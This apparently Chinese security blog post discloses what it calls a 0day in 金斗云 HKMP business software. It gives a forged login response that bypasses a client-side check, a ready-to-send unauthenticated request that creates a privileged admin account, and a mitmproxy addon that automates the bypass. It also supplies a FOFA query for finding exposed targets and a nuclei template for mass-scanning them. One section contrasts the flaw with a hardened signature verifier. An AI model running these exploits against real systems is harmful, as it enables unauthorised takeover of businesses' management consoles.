[0day] 金斗云 HKMP Smart Business Software


Original  shuxi  黑白防线  2024-07-04 19:24

Author | 书汐

1. About 金斗云 HKMP Smart Business Software:

金斗云 Smart Business Software is a feature-rich, easy-to-use management system. Through its management tooling it is meant to help businesses run efficiently, streamline processes, cut costs and improve the customer experience.

2. Vulnerability description:

01. Logic flaw (login state decided client-side):

Log in with any username and password, intercept the exchange, and replace the server's response with the one below; the front end then treats the login as successful and opens the admin console. The client decides it is "logged in" from the response body alone rather than from a server-issued session, so the check can be satisfied entirely from the attacker's side. Note that a tampered response only yields a usable console when the backend API also fails to enforce authentication on the requests the console then issues; the unauthenticated user-creation request in the next item shows that it does not.

HTTP/1.1 200 
Content-Type: application/json
Date: Tue, 25 Jun 2024 15:22:37 GMT
Connection: close
Content-Length: 205

{"code":"1000","message":"成功","data":{"userCode":"admin","userName":"系统管理员","level":"*","privilege":"*","version":"1.0.138.387","companyName":"","logo":"","expiryTime":"2034-03-20 00:00:00"}}

02. Arbitrary user creation (unauthenticated):

Send the following request directly, without any prior login. The envelope carries appId/mchId/deviceId/timestamp/nonce/sign fields, but the literal value sign="hkmp" is accepted, and the acting administrator (adminUserCode/adminUserName) is supplied by the client in the body rather than derived from a session.

POST /admin/user/add HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate

{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"root1234","userName":"root1234","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}
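The request above is accepted with sign="hkmp", which means whatever the server does with the envelope, it does not recompute a signature, bound the timestamp or track nonces. The following is an added example, not the vendor's code and not the actual HKMP signing algorithm (which the post does not disclose): it places a reconstruction of the observed "accept any sign" behaviour beside a hardened verifier so the three checks a server-side envelope validation needs are concrete. The HMAC-SHA256 scheme, the canonical serialisation, the shared secret and the 300-second window are all assumptions.

```python
"""Added example, not the vendor's code: why the observed /admin/user/add request gets through.

The actual HKMP signing scheme is not published in the write-up. The HMAC-SHA256
construction, the canonical JSON serialisation and MERCHANT_SECRET below are
assumptions used to show what a server-side check must do: recompute the
signature, bound the timestamp, and reject replayed nonces.
"""
import hashlib
import hmac
import json

# Assumption: a per-merchant shared secret known to the server and the real client.
MERCHANT_SECRET = b"example-shared-secret-not-from-the-vendor"
MAX_CLOCK_SKEW = 300  # seconds; assumption

# The request captured in the write-up (the 'data' payload is unchanged).
OBSERVED_REQUEST = {
    "appId": "hkmp", "mchId": "hkmp", "deviceId": "hkmp",
    "timestamp": 1719305067, "nonce": 5223015867, "sign": "hkmp",
    "data": {"userCode": "root1234", "userName": "root1234", "password": "123456",
             "privilege": ["1000", "8000", "8010", "2000", "2001", "2010", "7000"],
             "adminUserCode": "admin", "adminUserName": "系统管理员"},
}


def canonical_bytes(envelope: dict) -> bytes:
    """Deterministic serialisation of everything except 'sign' (assumed scheme)."""
    unsigned = {k: v for k, v in envelope.items() if k != "sign"}
    return json.dumps(unsigned, sort_keys=True, separators=(",", ":"),
                      ensure_ascii=False).encode("utf-8")


def compute_sign(envelope: dict, secret: bytes) -> str:
    """HMAC-SHA256 over the canonical envelope; 'sign' itself is excluded."""
    return hmac.new(secret, canonical_bytes(envelope), hashlib.sha256).hexdigest()


def vulnerable_verify(envelope: dict) -> bool:
    """Reconstruction of the behaviour the observed request demonstrates:
    only the presence of the fields is checked, so any 'sign' value passes."""
    required = ("appId", "mchId", "deviceId", "timestamp", "nonce", "sign")
    return all(k in envelope for k in required)


class HardenedVerifier:
    """Recomputes the signature, bounds the timestamp and rejects nonce reuse.

    A valid envelope proves the caller holds the merchant secret; it does not
    prove a logged-in administrator made the request. The acting admin must
    still come from the server-side session, never from data.adminUserCode.
    """

    def __init__(self, secret: bytes, max_skew: int = MAX_CLOCK_SKEW):
        self.secret = secret
        self.max_skew = max_skew
        self.seen = {}  # nonce -> timestamp, pruned on every call

    def verify(self, envelope: dict, now: float):
        try:
            ts = int(envelope["timestamp"])
            nonce = str(envelope["nonce"])
            sign = str(envelope["sign"])
        except (KeyError, TypeError, ValueError):
            return False, "malformed envelope"
        # 1. Bound the timestamp so a captured request cannot be replayed forever.
        if abs(now - ts) > self.max_skew:
            return False, "timestamp outside window"
        # 2. Recompute the signature and compare in constant time.
        if not hmac.compare_digest(compute_sign(envelope, self.secret), sign):
            return False, "bad signature"
        # 3. Each nonce is accepted once inside the window (expired ones pruned first).
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.max_skew}
        if nonce in self.seen:
            return False, "nonce reused"
        self.seen[nonce] = ts
        return True, "ok"


def demo(now=None) -> dict:
    """Run both checks against the observed request and a properly signed copy."""
    now = OBSERVED_REQUEST["timestamp"] if now is None else now
    verifier = HardenedVerifier(MERCHANT_SECRET)
    results = {
        "vulnerable_accepts_observed": vulnerable_verify(OBSERVED_REQUEST),
        "hardened_observed": verifier.verify(OBSERVED_REQUEST, now),
    }
    signed = dict(OBSERVED_REQUEST)
    signed["sign"] = compute_sign(signed, MERCHANT_SECRET)
    results["hardened_signed"] = verifier.verify(signed, now)
    results["hardened_replay"] = verifier.verify(signed, now)          # same nonce again
    results["hardened_stale"] = verifier.verify(signed, now + 3600)    # an hour later
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The order of the checks matters: the timestamp window is evaluated before the signature so that the nonce cache never grows beyond one window's worth of entries, and the signature is checked before the nonce is recorded so that an attacker cannot burn nonces with unsigned garbage.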

3. Reproduction:

01. FOFA query

title=="金斗云"

02. Logic flaw

Open the target URL, enter any username and password, click Login and intercept the traffic.

Replace the response with the successful login response shown in section 2.

Login succeeds.
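The three steps above can be automated with a mitmproxy addon that performs the response replacement from section 2 every time the login endpoint answers, so the bypass can be retested without editing each response by hand in Burp. This is an added example, not code from the original post. The post does not show the login request itself, so `LOGIN_PATH` is an assumption and must be set to whatever path the target's login form actually posts to; the forged body is the captured response from section 2.

```python
"""mitmproxy addon: rewrite the HKMP login response into the captured 'success' body.

Added example, not code from the original post. Run with
    mitmdump -s hkmp_login_rewrite.py --listen-port 8080
and point the browser at that proxy. LOGIN_PATH is an assumption.
"""
import json

# Assumption: the write-up shows only the login response, not the request path.
LOGIN_PATH = "/admin/login"

# Successful response body captured in the write-up (section 2), as a dict.
FORGED_BODY = {
    "code": "1000",
    "message": "成功",
    "data": {
        "userCode": "admin",
        "userName": "系统管理员",
        "level": "*",
        "privilege": "*",
        "version": "1.0.138.387",
        "companyName": "",
        "logo": "",
        "expiryTime": "2034-03-20 00:00:00",
    },
}


def is_login_response(path: str, content_type: str) -> bool:
    """Rewrite only JSON responses to the login endpoint; the query string is ignored."""
    return path.split("?", 1)[0] == LOGIN_PATH and "application/json" in content_type.lower()


def forge_login_response(original_body: str) -> str:
    """Return the body the front end should see.

    A failure body (any code other than 1000, or non-JSON) is replaced wholesale.
    A genuine success is passed through unchanged so a real login is not masked.
    """
    try:
        parsed = json.loads(original_body)
    except ValueError:
        parsed = {}
    if isinstance(parsed, dict) and parsed.get("code") == "1000":
        return original_body
    return json.dumps(FORGED_BODY, ensure_ascii=False, separators=(",", ":"))


# mitmproxy hook, guarded so the pure functions above import without mitmproxy installed.
try:
    from mitmproxy import http

    def response(flow: http.HTTPFlow) -> None:
        if flow.response is None:
            return
        ctype = flow.response.headers.get("Content-Type", "")
        if not is_login_response(flow.request.path, ctype):
            return
        original = flow.response.get_text(strict=False) or ""
        # Assigning .text makes mitmproxy recompute Content-Length for the new body.
        flow.response.status_code = 200
        flow.response.text = forge_login_response(original)
except ImportError:
    pass
```

Leaving genuine code 1000 responses untouched keeps the addon honest during testing: if the console appears after a rewrite but not after a real login, the finding is the client-side trust, not something else in the session flow.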

03. Arbitrary user creation

Send the payload from section 2 directly to the target.

04. Batch scanning PoC for nuclei

Remember to change the username in the template. A match means a real account with the listed privileges was created on that host, so use a distinctive user code and password, and remove the account afterwards.

id: hkmp-unauth-user-add

info:
  name: 金斗云 HKMP - Unauthenticated user creation via /admin/user/add
  author: god
  severity: high
  description: |
    /admin/user/add accepts a user-creation request without a session and
    without validating the "sign" field, so an unauthenticated attacker can
    create a privileged account. A match creates a real account on the
    target: change userCode/userName/password before use and clean up after.
  metadata:
    max-request: 1
    fofa-query: title=="金斗云"
    verified: true

http:
- method: POST
  path:
  - '{{RootURL}}/admin/user/add'
  # Content-Length is computed by nuclei and must not be hardcoded here;
  # Origin/Referer follow the target instead of a fixed host.
  headers:
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Content-Type: application/json;charset=UTF-8
    Origin: '{{RootURL}}'
    Referer: '{{RootURL}}/'
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
    X-Requested-With: XMLHttpRequest
  body: '{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067,"nonce":5223015867,"sign":"hkmp","data":{"userCode":"CHANGEME","userName":"CHANGEME","password":"CHANGEME","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}}'

  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: status
      status:
        - 200
    - type: word
      part: body
      words:
        - "成功"

-END-
